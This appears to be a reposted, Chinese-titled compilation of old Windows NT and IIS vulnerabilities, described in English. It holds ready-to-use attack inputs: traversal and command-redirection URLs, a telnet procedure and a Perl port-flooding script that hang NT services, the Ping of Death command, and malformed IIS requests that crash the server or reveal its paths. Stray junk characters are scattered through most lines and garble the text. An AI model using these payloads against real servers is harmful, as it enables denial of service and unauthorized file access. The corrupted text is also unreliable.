NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
  n+ ]7 P- f+ F: ZA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
6 B2 |, ?+ l/ P' r& Z
1 O: c5 E8 k) `5 g: c. [7 sA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
& f* b4 i. E9 l" O3 j
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

0 C* e, S6 ]) {/ ]2 R, U5 t& d3 v' w  Q--------------------------------------------------------------------
" H3 p# J9 h$ b0 I
1 \: b* ^$ N( T7 v6 _  g1 ?- [" {( q! k受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
) O  t# _# I+ m4 f& Z
8 ~) O# T6 |- LIf the file 'target.bat' exists, the file will be truncated.


9 P& o# ^* j; w3 q5 e" rA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

----------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
7 d5 }4 ?2 M9 _$ g) i; m7 k4 e& y' t
The following steps;
( y  f# ?7 C5 Z1 _2 ~7 c' Y# W
  W' o5 S! M% D4 k3 lTelnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
6 _, }8 Z2 u& N/ w5 K$ ~6 O6 ~; zExit Telnet
# e7 ~/ K$ J. {2 c- R' eresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

" f$ @+ E8 x" B- z& u% |When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
2 }, s- j0 Z) C5 K# Z% L$ v
+ H: J% K& q: J3 WThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

% b; w; q/ v% a+ S$ bIf a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
" B$ }( {) m4 ]7 B9 T
) j3 g# Q" k# G9 G- W: \The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

6 s. f' M0 V# `7 X; {' t3 j/*begin poke code*/

0 ]# q! N) x( C' U7 E% ~use Socket;
use FileHandle;
require "chat2.pl";
/ J% @9 E& B4 m( u' [
$systemname = $ARGV[0] && shift;

$ c, z' B5 R' q1 a8 x$verbose = 1; # tell me what you're hitting
: q) [  O' \8 F& \8 J$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
6 v  N3 \3 S0 R3 z& N. K+ q" T" D{

2 s' U( T$ _& r  M7 N$ n( C
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
4 s. \2 D4 Y& p7 H# Enext;
}
9 R$ z9 k# p3 z7 r: T$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
/ n& t" Q; `2 n( ~& |7 oif ($verbose) {
( p  T' {' _& W/ Y9 ]6 K+ o$ eprint "Trying port: $port\n";
}
chat::close($fh);

8 N1 }/ c' n% G}
/ N- I) K8 @) S! g
8 `; c7 {3 x" |! T
/*end poke code*/
( G' n1 G7 Q$ h. n
+ X+ n- G- e4 }! TSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

受影響系統(tǒng):4.0
" `0 x& O) \; [9 OUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
6 y4 S) V" H, G$ s
1 B8 v0 W6 l7 v+ L1 F% @) ]* mThis attack causes Dr. Watson to display an alert window and to log an error:
( g/ M# o6 u+ e. t; |- }6 m
% K3 q  T' A% p8 i0 ^/ H"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
# S" `/ E( R* \5 V1 J2 q
--------------------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
: b; `) `9 m2 f) Y' b7 jLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
( b. u3 G6 W6 H+ \( I
STOP: 0X0000001E
) x9 L7 |4 \7 d. lKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
$ @' h( R/ }$ D. F
* }' |$ |* f* z-OR-

STOP: 0x0000000A
+ J% l3 t2 s& G8 ]- BIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
% _6 K) j' ^) f' Z  s2 o  y
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

5 G7 Z: ~' @. o$ V  |, Q--------------------------------------------------------------------------------
( R6 ^5 X6 M7 ]3 i. L
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

/ o: J: d  o* q8 m4 y: n9 E--------------------------------------------------------

5 @/ O4 |: ?8 SIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server